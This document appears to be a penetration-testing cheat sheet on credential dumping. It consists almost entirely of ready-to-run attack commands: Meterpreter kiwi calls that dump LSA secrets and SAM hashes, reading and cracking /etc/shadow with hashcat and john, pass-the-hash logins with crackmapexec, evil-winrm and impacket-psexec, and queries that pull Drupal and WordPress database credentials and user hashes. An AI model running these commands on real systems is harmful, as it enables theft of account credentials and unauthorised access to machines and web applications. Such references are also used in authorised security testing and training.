Credential Dumping

Windows - Kiwi (Meterpreter)

load kiwi
creds_all           # Dump all credentials at once
lsa_dump_sam        # SAM database - local account NTLM hashes
lsa_dump_secrets    # LSA secrets - DefaultPassword, service account passwords

Windows - LSA Secrets

lsa_dump_secrets can reveal the DefaultPassword - the plaintext password configured for auto-login:

lsa_dump_secrets
# Look for:
# DefaultDomainName: WORKGROUP
# DefaultUserName:   Administrator
# DefaultPassword:   <plaintext password>

Windows - SAM Dump Output

lsa_dump_sam
# Output format:
# RID  : 000001f4 (500)  User : Administrator  Hash NTLM: <hash>
# RID  : 000001f5 (501)  User : Guest
# RID  : 000003e8 (1000) User : <localuser>     Hash NTLM: <hash>

Field       Description
RID         Relative ID - 500 = Administrator, 501 = Guest
Hash NTLM   32-character hex hash - crack offline or use for PTH

Windows - hashdump

# Quick dump without kiwi (may fail without SYSTEM)
hashdump
run post/windows/gather/hashdump

Linux - /etc/shadow

cat /etc/shadow
# Hash format: $id$salt$hash
# $1$ = MD5, $5$ = SHA-256, $6$ = SHA-512
# Extract and crack
unshadow /etc/passwd /etc/shadow > hashes.txt
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt   # SHA-512 ($6$)
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Offline Hash Cracking - Hashcat

Hash Type               Mode   Example
NTLM (Windows)          1000   hashcat -m 1000 hashes.txt rockyou.txt
SHA-512crypt (Linux)    1800   hashcat -m 1800 hashes.txt rockyou.txt
Drupal 7                7900   hashcat -m 7900 hashes.txt rockyou.txt
bcrypt                  3200   hashcat -m 3200 hashes.txt rockyou.txt
MD5                     0      hashcat -m 0 hashes.txt rockyou.txt

hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --show   # Show cracked results
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --force  # Force if GPU errors

Pass-the-Hash

Command                                                 Description
crackmapexec smb <IP> -u administrator -H <NTLM>        SMB PTH
crackmapexec winrm <IP> -u administrator -H <NTLM>      WinRM PTH
evil-winrm -i <IP> -u administrator -H <NTLM>           evil-winrm PTH
impacket-psexec administrator@<IP> -hashes :<NTLM>      PSExec PTH

Drupal / Web Application Credentials

# Drupal - database credentials in settings.php
grep -A 10 "'database'" /var/www/html/sites/default/settings.php

# Drupal - extract user hashes from the DB
mysql -u drupal -p<pass> -e "SELECT name, mail, pass FROM drupal.users;"

# WordPress - database credentials in wp-config.php
grep -E "DB_NAME|DB_USER|DB_PASSWORD" /var/www/html/wordpress/wp-config.php

# WordPress - users from the DB
mysql -u <user> -p<pass> -e "SELECT user_login, user_pass FROM wordpress.wp_users;"